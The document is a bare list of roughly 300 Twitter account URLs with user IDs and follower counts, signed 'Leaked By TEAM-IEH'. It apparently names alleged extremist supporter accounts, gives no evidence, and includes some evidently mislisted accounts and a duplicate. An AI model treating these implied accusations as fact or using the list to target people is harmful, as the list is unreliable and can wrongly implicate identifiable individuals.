https://twitter.com/Med__IS1                https://twitter.com/intent/user?user_id=2974662970        188 followers
https://twitter.com/inconnito213        https://twitter.com/intent/user?user_id=2757574506        96 followers
https://twitter.com/ArdulMalahim          https://twitter.com/intent/user?user_id=58054668           88 followers
https://twitter.com/12336387150                https://twitter.com/intent/user?user_id=2790116424        87 followers
https://twitter.com/AbuBrams                https://twitter.com/intent/user?user_id=2828476199        93 followers
https://twitter.com/fadehag                https://twitter.com/intent/user?user_id=2724056296        86 followers
https://twitter.com/_abujameelah        https://twitter.com/intent/user?user_id=2909202167        87 followers
https://twitter.com/Awlakii_IS                https://twitter.com/intent/user?user_id=2959231086        150 followers
https://twitter.com/TeTo903                https://twitter.com/intent/user?user_id=2261226878        84 followers
https://twitter.com/mohammadlhibi        https://twitter.com/intent/user?user_id=2967715938        108 followers
https://twitter.com/khancentral                https://twitter.com/intent/user?user_id=2171038853        83 followers
https://twitter.com/HabibahJarjani        https://twitter.com/intent/user?user_id=2933208528        20 followers
https://twitter.com/alchttal                https://twitter.com/intent/user?user_id=2882766409        79 followers
https://twitter.com/AinAlIslam             https://twitter.com/intent/user?user_id=1978210369        117 followers
https://twitter.com/antizholim1                https://twitter.com/intent/user?user_id=2961667916        88 followers
https://twitter.com/muhammad0313                https://twitter.com/intent/user?user_id=554257740      84 followers
https://twitter.com/YMarliche          https://twitter.com/intent/user?user_id=2861631340     78 followers
https://twitter.com/mero4331                https://twitter.com/intent/user?user_id=2952673709       98 followers
https://twitter.com/dawla_2         https://twitter.com/intent/user?user_id=2794081765         91 followers
https://twitter.com/yussufabdelaziz        https://twitter.com/intent/user?user_id=2851719575        67 followers   tweet protected
https://twitter.com/w53713629         https://twitter.com/intent/user?user_id=2935221902     63 followers
https://twitter.com/hamed214a                https://twitter.com/intent/user?user_id=2894595088        74 followers
https://twitter.com/SALADAIN74                https://twitter.com/intent/user?user_id=1090423357        70 followers
https://twitter.com/ReWatchX                https://twitter.com/intent/user?user_id=2856694188        75 followers
https://twitter.com/teduastedua                https://twitter.com/intent/user?user_id=2844908611        333 followers
https://twitter.com/MalayaWitness        https://twitter.com/intent/user?user_id=2944974782        94 followers
https://twitter.com/alhamdulilah006        https://twitter.com/intent/user?user_id=1569953760       70 followers
https://twitter.com/salafyasly                https://twitter.com/intent/user?user_id=565870437        54 followers
https://twitter.com/FR_IIS                https://twitter.com/intent/user?user_id=2945840212        58 followers
https://twitter.com/_Khilafah_                    https://twitter.com/intent/user?user_id=2978540368         61 followers
https://twitter.com/patronalou2                https://twitter.com/intent/user?user_id=2953295583        60 followers
https://twitter.com/jbelimohamed343        https://twitter.com/intent/user?user_id=2962550523        87 followers
https://twitter.com/HamzaKhalid3219        https://twitter.com/intent/user?user_id=1962499146        55 followers
https://twitter.com/Amelia_Dawlah        https://twitter.com/intent/user?user_id=2965071730        74 followers
https://twitter.com/ummzaynebb                https://twitter.com/intent/user?user_id=2940007759        58 followers
https://twitter.com/spam20161                https://twitter.com/intent/user?user_id=2943158600        66 followers
https://twitter.com/abuhafs87                https://twitter.com/intent/user?user_id=2479960286        55 followers
https://twitter.com/zakharik_L                https://twitter.com/intent/user?user_id=1850920933        53 folowers
https://twitter.com/IS__5                https://twitter.com/intent/user?user_id=2966707540        75 followers
https://twitter.com/louatitarek1        https://twitter.com/intent/user?user_id=2771042561        50 followers
https://twitter.com/alnasrlpen                https://twitter.com/intent/user?user_id=2952227042        54 followers
https://twitter.com/OussamaMuhajir        https://twitter.com/intent/user?user_id=2904243359       54 followers
https://twitter.com/nhiuo                https://twitter.com/intent/user?user_id=2935500016        45 followers
https://twitter.com/tasnim071191        https://twitter.com/intent/user?user_id=2875634033        40 followers
https://twitter.com/amatulwahid11               https://twitter.com/intent/user?user_id=2960864631        43 followers
https://twitter.com/ax4media                https://twitter.com/intent/user?user_id=2619149392        42 followers
https://twitter.com/abuislamalawlqi        https://twitter.com/intent/user?user_id=2858127074        37 followers
https://twitter.com/ksa_3ajel_news        https://twitter.com/intent/user?user_id=2969836975        124 followers
https://twitter.com/islamicstaten        https://twitter.com/intent/user?user_id=2881619003        33 followers
https://twitter.com/bilkh3100                https://twitter.com/intent/user?user_id=2869098766        29 followers
https://twitter.com/Tahaatwan_1                https://twitter.com/intent/user?user_id=2706751352        34 followers
https://twitter.com/a_fallujah                https://twitter.com/intent/user?user_id=2866102644        35 followers
https://twitter.com/salilalsawarm        https://twitter.com/intent/user?user_id=2940747922        38 followers
https://twitter.com/liondushaam                https://twitter.com/intent/user?user_id=2958947236        32 followers
https://twitter.com/motachadid                https://twitter.com/intent/user?user_id=2865802556        27 followers
https://twitter.com/abousarraettoun        https://twitter.com/intent/user?user_id=591369211        30 followers
https://twitter.com/zahalof24                https://twitter.com/intent/user?user_id=1488822258        35 followers
https://twitter.com/jouri301                https://twitter.com/intent/user?user_id=2971140861        50 followers
https://twitter.com/biiiigaa                https://twitter.com/intent/user?user_id=2925892644        31 followers
https://twitter.com/mmowahida2                https://twitter.com/intent/user?user_id=2798933577        37 followers
https://twitter.com/altoama_osama        https://twitter.com/intent/user?user_id=2262711186       29 followers     protected   tweets
https://twitter.com/yar_malek          https://twitter.com/intent/user?user_id=856383480     23 followers
https://twitter.com/sese82347690        https://twitter.com/intent/user?user_id=2862236322        23 followers
https://twitter.com/aym6074                https://twitter.com/intent/user?user_id=2533538534        20 followers
https://twitter.com/abumahammad455        https://twitter.com/intent/user?user_id=2863247527        20 followers
https://twitter.com/OmarAlFarooq_1      https://twitter.com/intent/user?user_id=2835918890        19 followers 
https://twitter.com/abu40ashami                https://twitter.com/intent/user?user_id=2917327101        18 followers
https://twitter.com/diallom10704263        https://twitter.com/intent/user?user_id=1089770605        16 followers
https://twitter.com/anamuslm                https://twitter.com/intent/user?user_id=282721226        16 followers
https://twitter.com/a61819                https://twitter.com/intent/user?user_id=2837292644        15 followers
https://twitter.com/mo16234169                https://twitter.com/intent/user?user_id=2825679700       17 followers
https://twitter.com/taqidine                https://twitter.com/intent/user?user_id=619602671        14 followers
https://twitter.com/hammam3211                https://twitter.com/intent/user?user_id=2943745912        13 followers
https://twitter.com/WharanDada31        https://twitter.com/intent/user?user_id=1708282448        10 followers
https://twitter.com/elewy77                https://twitter.com/intent/user?user_id=2971248437        87 followers
https://twitter.com/isisallwrld_3        https://twitter.com/intent/user?user_id=2816720843        10 followers
https://twitter.com/afgrgyrs                https://twitter.com/intent/user?user_id=2752179637        10 followers
https://twitter.com/a3404yahoocom1        https://twitter.com/intent/user?user_id=2958930178        6 followers
https://twitter.com/jqhshsyajjb                https://twitter.com/intent/user?user_id=2950230535        12 followers
https://twitter.com/aomr277                https://twitter.com/intent/user?user_id=2716353776        6 followers
https://twitter.com/khaldioui                https://twitter.com/intent/user?user_id=2500106675        6 followers
https://twitter.com/AchrafAbu                https://twitter.com/intent/user?user_id=2934169450        5 followers
https://twitter.com/Ikhlaas1436                https://twitter.com/intent/user?user_id=2960902816        4 followers
https://twitter.com/somre3135                https://twitter.com/intent/user?user_id=2971811798        10 followers
https://twitter.com/Strategyaffairs        https://twitter.com/intent/user?user_id=2434942140        10 followers
https://twitter.com/Waew                https://twitter.com/intent/user?user_id=313284006        2 followers
https://twitter.com/abuazzam0943        https://twitter.com/intent/user?user_id=2861408351        4 followers
https://twitter.com/aboushaheed           https://twitter.com/intent/user?user_id=2827463105        2 followers
https://twitter.com/QZaina                https://twitter.com/intent/user?user_id=1370803382        1 follower
https://twitter.com/AbdoWord                https://twitter.com/intent/user?user_id=2953074736        1 follower
https://twitter.com/Bdbdlastreet             https://twitter.com/intent/user?user_id=797119687     20 followers 
https://twitter.com/ShamyWaddah          https://twitter.com/intent/user?user_id=2976397839    170 followers
https://twitter.com/uicforce            https://twitter.com/intent/user?user_id=1368774048     600 followers
https://twitter.com/jesuiskouachi1          https://twitter.com/intent/user?user_id=2979855917     3 followers
https://twitter.com/jesuiskouachi3         https://twitter.com/intent/user?user_id=2975140057   14 followers
https://twitter.com/jesuiskouachi4          https://twitter.com/intent/user?user_id=2974888170     10 followers
https://twitter.com/stallionAMG                https://twitter.com/intent/user?user_id=1648980379        66 followers   
https://twitter.com/maea171                https://twitter.com/intent/user?user_id=2858332478        283 followers
https://twitter.com/UmmSuleym             https://twitter.com/intent/user?user_id=2355594481              891 followers
https://twitter.com/trjman06             https://twitter.com/intent/user?user_id=484020676              1622 followers
https://twitter.com/TQ_44             https://twitter.com/intent/user?user_id=2455766350              3805 followers
https://twitter.com/sumaya_hmd             https://twitter.com/intent/user?user_id=2946129225              27 followers
https://twitter.com/sula7_2014_1             https://twitter.com/intent/user?user_id=2888616723              199 followers
https://twitter.com/sot_Ansar             https://twitter.com/intent/user?user_id=221117595              439 followers
https://twitter.com/SoldierMerciful             https://twitter.com/intent/user?user_id=2783538555              1047 followers
https://twitter.com/skkkr733             https://twitter.com/intent/user?user_id=1507798717              143 followers
https://twitter.com/sholehkawi             https://twitter.com/intent/user?user_id=376221826              532 followers
https://twitter.com/shbL876ani             https://twitter.com/intent/user?user_id=2733551916              486 followers
https://twitter.com/SamrBgbg             https://twitter.com/intent/user?user_id=1732658365              190 followers
https://twitter.com/SamiaSimsim1             https://twitter.com/intent/user?user_id=968957599              243 followers
https://twitter.com/salan0165             https://twitter.com/intent/user?user_id=2875451064              1486 followers
https://twitter.com/salam77779             https://twitter.com/intent/user?user_id=2971729725              4977 followers
https://twitter.com/sakaraljazeera             https://twitter.com/intent/user?user_id=2577526938              59 followers
https://twitter.com/saidboragba             https://twitter.com/intent/user?user_id=2775213773              1976 followers
https://twitter.com/sahera80             https://twitter.com/intent/user?user_id=2544588674              811 followers
https://twitter.com/s9EE5qnLIHGXfs4             https://twitter.com/intent/user?user_id=2797564100              454 followers
https://twitter.com/RostomTounisi             https://twitter.com/intent/user?user_id=2819531236              199 followers
https://twitter.com/RCensure             https://twitter.com/intent/user?user_id=2762045944              84 followers
https://twitter.com/rb3ee_123             https://twitter.com/intent/user?user_id=2746659791              952 followers
https://twitter.com/rasheedy73             https://twitter.com/intent/user?user_id=945051691              115 followers
https://twitter.com/Ramzedine75             https://twitter.com/intent/user?user_id=2277237790              74 followers
https://twitter.com/Qaswaraaa             https://twitter.com/intent/user?user_id=2650059780              495 followers
https://twitter.com/qaree50             https://twitter.com/intent/user?user_id=2300838837              704 followers
https://twitter.com/Political_23             https://twitter.com/intent/user?user_id=311704607              16544 followers
https://twitter.com/PalGaza             https://twitter.com/intent/user?user_id=248890404              41 followers
https://twitter.com/Pal_Intifada             https://twitter.com/intent/user?user_id=1005120595              1338 followers
https://twitter.com/oumbilal4             https://twitter.com/intent/user?user_id=2794114246              10736 followers
https://twitter.com/OtagesMusulmans             https://twitter.com/intent/user?user_id=2890357780              311 followers
https://twitter.com/osama_bin_bader             https://twitter.com/intent/user?user_id=2796502389              240 followers
https://twitter.com/omar123omar1             https://twitter.com/intent/user?user_id=2773658410              889 followers
https://twitter.com/Omr_rQ             https://twitter.com/intent/user?user_id=2881398280              16781 followers
https://twitter.com/Oda123124Ahmad             https://twitter.com/intent/user?user_id=2950846740              53 followers
https://twitter.com/now_egy             https://twitter.com/intent/user?user_id=540920860              185555 followers
https://twitter.com/Nos_Verite             https://twitter.com/intent/user?user_id=2976341205              300 followers
https://twitter.com/TheyRTheEnemy             https://twitter.com/intent/user?user_id=2794047470              11102 followers
https://twitter.com/NessUmmImran             https://twitter.com/intent/user?user_id=2899311461              151 followers
https://twitter.com/mwohip2             https://twitter.com/intent/user?user_id=2781820665              1531 followers
https://twitter.com/muslimkhilafah             https://twitter.com/intent/user?user_id=376754196              157 followers
https://twitter.com/muslem252             https://twitter.com/intent/user?user_id=2589169237              146 followers
https://twitter.com/mual99mual             https://twitter.com/intent/user?user_id=2758574247              1364 followers
https://twitter.com/mszzz444             https://twitter.com/intent/user?user_id=2793427431              844 followers
https://twitter.com/mos_lem             https://twitter.com/intent/user?user_id=868806284              159 followers
https://twitter.com/monsefmosoob2             https://twitter.com/intent/user?user_id=2792212456              8772 followers
https://twitter.com/mohamedmojahid7             https://twitter.com/intent/user?user_id=2958101806              1130 followers
https://twitter.com/mohajerr1             https://twitter.com/intent/user?user_id=2779414597              4739 followers
https://twitter.com/mgndl             https://twitter.com/intent/user?user_id=2857405272              128 followers
https://twitter.com/MemlikPasha             https://twitter.com/intent/user?user_id=1477976084              7276 followers
https://twitter.com/medo19892015             https://twitter.com/intent/user?user_id=2918053029              305 followers
https://twitter.com/mediafront2             https://twitter.com/intent/user?user_id=2959762587              1414 followers
https://twitter.com/MEDIA_MOUSLIM             https://twitter.com/intent/user?user_id=2795961285              187 followers
https://twitter.com/mahmmad2327             https://twitter.com/intent/user?user_id=2766076149              74 followers
https://twitter.com/lrd55             https://twitter.com/intent/user?user_id=293908336              193 followers
https://twitter.com/lahn_m             https://twitter.com/intent/user?user_id=1027136984              23 followers
https://twitter.com/CompteSuspendu_             https://twitter.com/intent/user?user_id=2966767577              222 followers
https://twitter.com/kkansaa1             https://twitter.com/intent/user?user_id=2795550512              17618 followers
https://twitter.com/shamsalhia_2             https://twitter.com/intent/user?user_id=2757948900              409 followers
https://twitter.com/Otaib_i             https://twitter.com/intent/user?user_id=2869618285              1664 followers
https://twitter.com/bakoon7             https://twitter.com/intent/user?user_id=2407416068              43178 followers
https://twitter.com/kheyradine             https://twitter.com/intent/user?user_id=2884736608              215 followers
https://twitter.com/kaak9ko             https://twitter.com/intent/user?user_id=2792070939              165 followers
https://twitter.com/JunudS             https://twitter.com/intent/user?user_id=2748690320              3461 followers
https://twitter.com/JihadShaam             https://twitter.com/intent/user?user_id=2596980212              470 followers
https://twitter.com/JabhatAlNusraNL             https://twitter.com/intent/user?user_id=2374817528              876 followers
https://twitter.com/JabhatAlNusraEN             https://twitter.com/intent/user?user_id=2371734582              3872 followers
https://twitter.com/Sawareem_             https://twitter.com/intent/user?user_id=2977453978              507 followers
https://twitter.com/Ibn_Mustafa_51             https://twitter.com/intent/user?user_id=2731009181              849 followers
https://twitter.com/isisinourheart             https://twitter.com/intent/user?user_id=2463766050              661 followers
https://twitter.com/isisbaghdad             https://twitter.com/intent/user?user_id=2849686712              121 followers
https://twitter.com/Is_omar88             https://twitter.com/intent/user?user_id=2807938005              9458 followers
https://twitter.com/iraksham             https://twitter.com/intent/user?user_id=1886509676              1136 followers
https://twitter.com/IbnOnis             https://twitter.com/intent/user?user_id=2718054227              410 followers
https://twitter.com/IbnAsSabeel             https://twitter.com/intent/user?user_id=2568449280              1544 followers
https://twitter.com/handhalahIS             https://twitter.com/intent/user?user_id=2908132464              416 followers
https://twitter.com/gzouli             https://twitter.com/intent/user?user_id=208951114              97 followers
https://twitter.com/ggaaqqwee             https://twitter.com/intent/user?user_id=2906020459              4331 followers
https://twitter.com/garibmou5             https://twitter.com/intent/user?user_id=2762956685              1 followers
https://twitter.com/garibmou4             https://twitter.com/intent/user?user_id=2762902379              1 followers
https://twitter.com/garibmou3             https://twitter.com/intent/user?user_id=2762900477              63 followers
https://twitter.com/mougarib2             https://twitter.com/intent/user?user_id=2762846529              2271 followers
https://twitter.com/asd__asd0             https://twitter.com/intent/user?user_id=1618884572              153 followers
https://twitter.com/S4Holland             https://twitter.com/intent/user?user_id=2895065201              154 followers
https://twitter.com/younnesaroumi             https://twitter.com/intent/user?user_id=2976240621              17 followers
https://twitter.com/AbouFeerozah             https://twitter.com/intent/user?user_id=2643481342              325 followers
https://twitter.com/Gen_Khilafah             https://twitter.com/intent/user?user_id=2922956032              170 followers
https://twitter.com/Najmu_Dawla             https://twitter.com/intent/user?user_id=2787659013              2224 followers
https://twitter.com/AbuYahyaKurdy             https://twitter.com/intent/user?user_id=2872229815              440 followers
https://twitter.com/AbuuZubayr             https://twitter.com/intent/user?user_id=2583876230              429 followers
https://twitter.com/Khurasaniy             https://twitter.com/intent/user?user_id=1693725823              229 followers
https://twitter.com/UmmKaltoum             https://twitter.com/intent/user?user_id=2461955048              55 followers
https://twitter.com/mominamatullah             https://twitter.com/intent/user?user_id=2269885007              127 followers
https://twitter.com/Ntruther             https://twitter.com/intent/user?user_id=2558309607              248 followers
https://twitter.com/jundullah97             https://twitter.com/intent/user?user_id=2754804487              167 followers
https://twitter.com/SAfrica2011_3             https://twitter.com/intent/user?user_id=2964215704              382 followers
https://twitter.com/abo_fahed12             https://twitter.com/intent/user?user_id=986860722              374 followers
https://twitter.com/safwen444             https://twitter.com/intent/user?user_id=2233466030              724 followers
https://twitter.com/SaraAnneuk             https://twitter.com/intent/user?user_id=2844196973              257 followers
https://twitter.com/JamilPilot             https://twitter.com/intent/user?user_id=2815242981              191 followers
https://twitter.com/nnmno7             https://twitter.com/intent/user?user_id=632804726              1153 followers
https://twitter.com/_Gremlinss_             https://twitter.com/intent/user?user_id=2894914563              182 followers
https://twitter.com/SuhejlaUhty             https://twitter.com/intent/user?user_id=2976605525              76 followers
https://twitter.com/FarithFilfilani             https://twitter.com/intent/user?user_id=2585774384              70 followers
https://twitter.com/3okasha9             https://twitter.com/intent/user?user_id=2846731926              52 followers
https://twitter.com/ModyElsa3edy             https://twitter.com/intent/user?user_id=2479654984              632 followers
https://twitter.com/FadhilHaroon             https://twitter.com/intent/user?user_id=2225528484              191 followers
https://twitter.com/LiliyenetXx             https://twitter.com/intent/user?user_id=2972525745              120 followers
https://twitter.com/UmmUbaydah__             https://twitter.com/intent/user?user_id=2517511810              552 followers
https://twitter.com/UmmSafiyyaah             https://twitter.com/intent/user?user_id=2733794174              189 followers
https://twitter.com/moakhan_             https://twitter.com/intent/user?user_id=1521902954              1311 followers
https://twitter.com/Mehdy_khaloua             https://twitter.com/intent/user?user_id=1216904449              80 followers
https://twitter.com/swordoftheummah             https://twitter.com/intent/user?user_id=2901339098              242 followers
https://twitter.com/TruthHaqq             https://twitter.com/intent/user?user_id=2753044900              223 followers
https://twitter.com/younisaaa74             https://twitter.com/intent/user?user_id=2888709032              284 followers
https://twitter.com/AustraliaWitnes             https://twitter.com/intent/user?user_id=2958090721              792 followers
https://twitter.com/fjoitdhgruwr6dg             https://twitter.com/intent/user?user_id=2887452608              1293 followers
https://twitter.com/Fallaga_Team             https://twitter.com/intent/user?user_id=2884176034              500 followers
https://twitter.com/erza3bz             https://twitter.com/intent/user?user_id=1464137893              1182 followers
https://twitter.com/enamiso             https://twitter.com/intent/user?user_id=2779702781              125 followers
https://twitter.com/emadham33492883             https://twitter.com/intent/user?user_id=1593346782              195 followers
https://twitter.com/ebouquatada             https://twitter.com/intent/user?user_id=2968891701              375 followers
https://twitter.com/DNACode13             https://twitter.com/intent/user?user_id=376330495              575 followers
https://twitter.com/dawlaty_mansora             https://twitter.com/intent/user?user_id=1396211425              315 followers
https://twitter.com/d_wlah151             https://twitter.com/intent/user?user_id=2916894361              6109 followers
https://twitter.com/Cyber_Caliphate             https://twitter.com/intent/user?user_id=2261930843              175 followers
https://twitter.com/Cub_Zarqawi4             https://twitter.com/intent/user?user_id=2884810764              1577 followers
https://twitter.com/CmoosHack             https://twitter.com/intent/user?user_id=2844927581              252 followers
https://twitter.com/ChahidAbou             https://twitter.com/intent/user?user_id=2863047471              112 followers
https://twitter.com/CameliaDawla             https://twitter.com/intent/user?user_id=2964994054              122 followers
https://twitter.com/BlackFlags007             https://twitter.com/intent/user?user_id=143042610              18 followers
https://twitter.com/Bint_Shaheed             https://twitter.com/intent/user?user_id=2207524123              163 followers
https://twitter.com/BilelChappe             https://twitter.com/intent/user?user_id=1086937321              586 followers
https://twitter.com/BarouBaroutch             https://twitter.com/intent/user?user_id=2921768181              315 followers
https://twitter.com/baqiya1133             https://twitter.com/intent/user?user_id=2349759729              592 followers
https://twitter.com/AzasSfg7             https://twitter.com/intent/user?user_id=2700670747              2559 followers
https://twitter.com/ayoubhrouch             https://twitter.com/intent/user?user_id=2440740907              11 followers
https://twitter.com/atlas_776             https://twitter.com/intent/user?user_id=2850728140              1267 followers
https://twitter.com/asod235             https://twitter.com/intent/user?user_id=2610608660              113 followers
https://twitter.com/aramsfaram1990             https://twitter.com/intent/user?user_id=2820458222              31 followers
https://twitter.com/anwar4u1111             https://twitter.com/intent/user?user_id=2734150809              313 followers
https://twitter.com/ansarulsham             https://twitter.com/intent/user?user_id=1897771604              8084 followers
https://twitter.com/AnsarAlJihad4             https://twitter.com/intent/user?user_id=2911229672              5682 followers
https://twitter.com/anashajissa200             https://twitter.com/intent/user?user_id=2968540505              915 followers
https://twitter.com/allser7             https://twitter.com/intent/user?user_id=520094641              1224 followers
https://twitter.com/AliyyahSbnh             https://twitter.com/intent/user?user_id=2276872763              426 followers
https://twitter.com/alialfhdawiy12             https://twitter.com/intent/user?user_id=2377184636              1591 followers
https://twitter.com/alhor_mohmad             https://twitter.com/intent/user?user_id=2367495763              298 followers
https://twitter.com/algzar576             https://twitter.com/intent/user?user_id=2776620069              66 followers
https://twitter.com/Aldaghstaney87             https://twitter.com/intent/user?user_id=2861111297              503 followers
https://twitter.com/alakida22121             https://twitter.com/intent/user?user_id=1597842006              761 followers
https://twitter.com/AlaaSalami78             https://twitter.com/intent/user?user_id=968589084              201 followers
https://twitter.com/Al_Furqan14             https://twitter.com/intent/user?user_id=2870522625              494 followers
https://twitter.com/ahmmhme2267             https://twitter.com/intent/user?user_id=2518144285              907 followers
https://twitter.com/ahmed_Oussman             https://twitter.com/intent/user?user_id=2373461522              14 followers
https://twitter.com/abzeeeyd             https://twitter.com/intent/user?user_id=2966549622              171 followers
https://twitter.com/AbuTalha58             https://twitter.com/intent/user?user_id=2550956802              264 followers
https://twitter.com/abunuh_alfarsi             https://twitter.com/intent/user?user_id=2930390949              176 followers
https://twitter.com/Abumikmik             https://twitter.com/intent/user?user_id=2784739831              196 followers
https://twitter.com/Abulmuwahhidin2             https://twitter.com/intent/user?user_id=2973886761              204 followers
https://twitter.com/abuessa__3             https://twitter.com/intent/user?user_id=2806135888              6631 followers
https://twitter.com/AbouSuheyla             https://twitter.com/intent/user?user_id=2861572175              583 followers
https://twitter.com/abohtefh_1             https://twitter.com/intent/user?user_id=2792615434              966 followers
https://twitter.com/abja78             https://twitter.com/intent/user?user_id=2567505337              1617 followers
https://twitter.com/abja78             https://twitter.com/intent/user?user_id=2567505337              1617 followers
https://twitter.com/Crackcaliphate             https://twitter.com/intent/user?user_id=2636444701              1119 followers
https://twitter.com/Aabbccc3777             https://twitter.com/intent/user?user_id=2636206964              597 followers
https://twitter.com/aaa_111333             https://twitter.com/intent/user?user_id=2611129426              303 followers
https://twitter.com/a57543399             https://twitter.com/intent/user?user_id=2473557791              1059 followers
https://twitter.com/a16__o             https://twitter.com/intent/user?user_id=515702143              405 followers
https://twitter.com/A_A_Rahman1             https://twitter.com/intent/user?user_id=2788987045              45 followers
https://twitter.com/33995490             https://twitter.com/intent/user?user_id=2358503124              791 followers
https://twitter.com/22asd_aleslam             https://twitter.com/intent/user?user_id=2943990760              267 followers
https://twitter.com/213Swas             https://twitter.com/intent/user?user_id=2914743138              641 followers
https://twitter.com/144Hurairah             https://twitter.com/intent/user?user_id=2976715875              431 followers
https://twitter.com/TxAowais             https://twitter.com/intent/user?user_id=2843999069              144 followers
https://twitter.com/111_isis             https://twitter.com/intent/user?user_id=2858775948              245 followers
https://twitter.com/BaqiyahMTA1436             https://twitter.com/intent/user?user_id=2970592660              95 followers
https://twitter.com/teete2121             https://twitter.com/intent/user?user_id=1923431886              1283 followers
https://twitter.com/Abo_mo3az22             https://twitter.com/intent/user?user_id=1599317635              4435 followers
https://twitter.com/a7zan777             https://twitter.com/intent/user?user_id=1883358246              1651 followers
https://twitter.com/nohislam565             https://twitter.com/intent/user?user_id=2515859352              647 followers
https://twitter.com/alkavkaze             https://twitter.com/intent/user?user_id=2228000734              294 followers
https://twitter.com/aldossry_k             https://twitter.com/intent/user?user_id=1586326340              192 followers
https://twitter.com/bahaarbahaar340             https://twitter.com/intent/user?user_id=1635187848              474 followers
https://twitter.com/ticomico12             https://twitter.com/intent/user?user_id=2856916715              195 followers
https://twitter.com/b05hly             https://twitter.com/intent/user?user_id=341009634              387 followers
https://twitter.com/v             https://twitter.com/intent/user?user_id=14733555              34849 followers
https://twitter.com/abohamza869             https://twitter.com/intent/user?user_id=2895750149              247 followers
https://twitter.com/sarah___loveis             https://twitter.com/intent/user?user_id=2987942860              1612 followers
https://twitter.com/babyloony88             https://twitter.com/intent/user?user_id=2987973352              2067 followers
https://twitter.com/WRakaanalhjazy             https://twitter.com/intent/user?user_id=2990574691              953 followers
https://twitter.com/baghdadia_4             https://twitter.com/intent/user?user_id=2903485004              3955 followers
https://twitter.com/islam9898463             https://twitter.com/intent/user?user_id=2888578970              823 followers
https://twitter.com/omab1237             https://twitter.com/intent/user?user_id=2812623347              4347 followers
https://twitter.com/MnswrM             https://twitter.com/intent/user?user_id=1635033643              1663 followers
https://twitter.com/TmKlash             https://twitter.com/intent/user?user_id=233171879              19213 followers
https://twitter.com/qtadhtaha1             https://twitter.com/intent/user?user_id=2778959115              1497 followers
https://twitter.com/aashaahmad20146             https://twitter.com/intent/user?user_id=2958113324              1048 followers
https://twitter.com/dawlajie7             https://twitter.com/intent/user?user_id=2832257744              1793 followers
https://twitter.com/ALanbar2_IS             https://twitter.com/intent/user?user_id=3000974431              535 followers

Leaked By
TEAM-IEH